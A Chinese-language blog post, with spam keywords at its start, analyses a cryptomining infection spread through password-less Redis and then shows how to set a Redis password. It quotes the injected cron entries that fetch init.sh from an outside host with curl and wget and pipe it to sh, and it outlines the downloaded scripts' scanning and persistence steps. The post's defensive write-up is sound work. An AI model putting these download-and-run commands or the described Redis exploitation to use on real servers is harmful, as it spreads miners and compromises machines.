html网站建设的步骤,全网营销是什么意思,免费做公益网站,在线申请注册入口前言 为什么redis要设置密码#xff1f; 内网环境可以不设置密码#xff0c;但是个人服务器#xff0c;以及线上公网服务器就有必要设置密码了。 昨天我查看了一下minio的redis事件通知#xff0c;查看redis的key时发现多了几个奇怪的key。backup1#xff0c;backup2&a…前言为什么redis要设置密码内网环境可以不设置密码但是个人服务器以及线上公网服务器就有必要设置密码了。昨天我查看了一下minio的redis事件通知查看redis的key时发现多了几个奇怪的key。backup1backup2backup3。然后我猜想应该是挖矿病毒。如下面所示这样就将定时任务和脚本注入到了我们机器当中就会开始执行 init.sh 脚本backup1 */2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh backup2 */3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh backup3 */4 * * * * root curl -fsSL http://en2an.top/cleanfda/init.sh | sh backup4 */5 * * * * root wd1 -q -O- http://en2an.top/cleanfda/init.sh | sh init.sh脚本内容是什么http://en2an.top/cleanfda/init.sh我们查看这个key的value能得到它会去请求一个地址我们打开看一下这个init.sh到底是什么东西。如下图所示是个脚本文件。这个脚本还挺多的关闭selinux、杀掉别人的挖矿进程、杀掉CPU占用过高的进程如果是自己就跳过、修改破坏系统命令、自己造一个下载器downloads()函数、解锁和加锁定时任务、添加挖矿技术任务、设置SSH免密登陆、下载执行矿机挖矿程序、关闭防火墙、清除日志、感染已知的免密机器、下载执行is.sh。is.sh脚本内容是什么。http://en2an.top/cleanfda/is.sh如下图所示上面的init.sh会下载我们的is.sh脚本。我们看一下这个脚本是干什么。如下图所示这个脚本的内容也挺多的。下载masscan扫描器、下载pnscan扫描器、安装 redis 用于创建 redis 未授权访问的漏洞、执行 rs.sh。rs.sh脚本内容是什么http://en2an.top/cleanfda/rs.sh上面的连接可以查看这个脚本内容是什么。开放 6379 端口、自动化利用redis未授权写入定时任务利用 pnscan 扫描b段IP 6379 端口利用 masscan 进行扫描端口。Redis如何设置密码经过以上分析就知道这个病毒主要是通过你的redis注入进去执行挖矿脚本。如果你的redis没有设置密码而且暴露在公网上就要小心了。可以通过以下两种方式对我们的redis进行设置密码。方式一修改我们的redis.conf配置文件需要注意的是这种方式因为修改了配置文件 需要重新启动我们的redis才能生效。找到我们的redis.conf文件。Windows如下图所示我们编辑此文件找到requirepass放开注释设置指定的值就重启redis就生效了。Linux的话因为大家的安装方式可能不同我这边是通过docker安装的做了映射的。这里就不给大家演示了找到自己安装在linux的redis目录找到redis.conf配置文件跟windows一样的操作配置完重启就Ok了。方式二连接我们的redis然后通过指令的方式设置密码。这种方式比较简单而且不需要重启就生效。下面的指令的意思就是把密码设置为123456公网可不要设置这么简单阿。config set requirepass 123456我们查看一下我们的redis的密码。config get requirepass这样我们的密码就设置成功了退出我们的redis客户端再次连接的时候就生效了。总结公网的redis一定要设置密码阿不要不设置密码设置密码就一个指令非常容易可不要偷懒噢。